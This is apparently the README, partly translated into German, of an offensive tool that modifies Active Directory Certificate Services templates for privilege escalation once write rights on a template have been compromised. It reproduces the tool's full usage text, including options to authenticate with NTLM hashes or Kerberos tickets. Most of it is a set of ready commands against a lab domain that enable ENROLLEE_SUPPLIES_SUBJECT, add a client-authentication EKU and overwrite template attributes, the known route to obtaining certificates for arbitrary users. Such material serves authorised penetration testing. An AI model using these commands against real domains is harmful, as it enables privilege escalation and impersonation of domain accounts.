
ADCS-Zertifikatsvorlagenänderung und ACL-Enumeration
Dieses Tool soll einen Bediener dabei unterstützen, ADCS-Zertifikatsvorlagen so zu modifizieren, dass ein erstellter anfälliger Zustand für eine Privilegienausweitung genutzt werden kann (und die Vorlage anschließend wieder in ihren vorherigen Zustand versetzt wird). Es wurde speziell für ein Szenario entwickelt, in dem WriteProperty-Rechte an einer Vorlage kompromittiert wurden, der Bediener jedoch unsicher ist, auf welche Eigenschaften sich das Recht bezieht. In diesem Szenario kann die ACL der Vorlage abgefragt und die relevanten ACE-Informationen mit Eigenschafts-GUIDs abgeglichen werden, um die modifizierbaren Eigenschaften zu bestimmen.
Zugehöriger Blogbeitrag zum Tool und Thema.
usage: modifyCertTemplate.py [-h] -template template name [-property property name] [-value new value] [-get-acl] [-dn distinguished name] [-raw] [-add flag name] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-ldaps]
target
Modify the attributes of an Active Directory certificate template
positional arguments:
target [[domain/]username[:password]
optional arguments:
-h, --help show this help message and exit
-template template name
Name of the target certificate template
-property property name
Name of the target template property
-value new value Value to set the specified template property to
-get-acl Print the certificate's ACEs
-dn distinguished name
Explicitly set the distinguished name of the certificate template
-raw Output the raw certificate template attributes
-add flag name Add a flag to an attribute, maintaining the existing flags
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will
use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ldaps Use LDAPS instead of LDAP
Fragen Sie eine Zertifikatsvorlage ab (alle Attribute)
python3 modifyCertTemplate.py -template KerberosAuthentication ez.lab/administrator:pass
Fragen Sie ein einzelnes Attribut einer Zertifikatsvorlage ab
python3 modifyCertTemplate.py -template KerberosAuthentication -property msPKI-Certificate-Name-Flag ez.lab/administrator:pass
Fragen Sie die Rohwerte aller Vorlagenattribute ab
python3 modifyCertTemplate.py -template KerberosAuthentication -raw ez.lab/administrator:pass
Fragen Sie die ACL einer Zertifikatsvorlage ab
python3 modifyCertTemplate.py -template KerberosAuthentication -get-acl ez.lab/administrator:pass
Obwohl nicht auf Zertifikatsvorlagen bezogen, kann die ACL jedes Objekts durch Angabe des Distinguished Name des Objekts abgefragt werden
python3 modifyCertTemplate.py -dn "CN=ws1,CN=computers,DC=ez,DC=lab" -get-acl ez.lab/administrator:pass
Fügen Sie das Flag ENROLLEE_SUPPLIES_SUBJECT zur Eigenschaft msPKI-Certificate-Name-Flag der Vorlage hinzu
python3 modifyCertTemplate.py -template KerberosAuthentication -add enrollee_supplies_subject -property msPKI-Certificate-Name-Flag ez.lab/administrator:pass
Aktualisieren Sie den Wert eines Attributs der Zertifikatsvorlage (Nicht-Listen-Eigenschaften)
python3 modifyCertTemplate.py -template KerberosAuthentication -property msPKI-Certificate-Name-Flag -value -150994944 ez.lab/administrator:pass
Fügen Sie eine EKU zur Eigenschaft pKIExtendedKeyUsage hinzu
python3 modifyCertTemplate.py -template KerberosAuthentication -add "client authentication" -property pKIExtendedKeyUsage ez.lab/administrator:pass
Aktualisieren Sie den Wert eines listenformatierten Attributs (d. h. setzen Sie den Wert von pKIExtendedKeyUsage explizit)
python3 modifyCertTemplate.py -template KerberosAuthentication -value "'1.3.6.1.5.5.7.3.4', '1.3.6.1.5.5.7.3.2'" -property pKIExtendedKeyUsage ez.lab/administrator:pass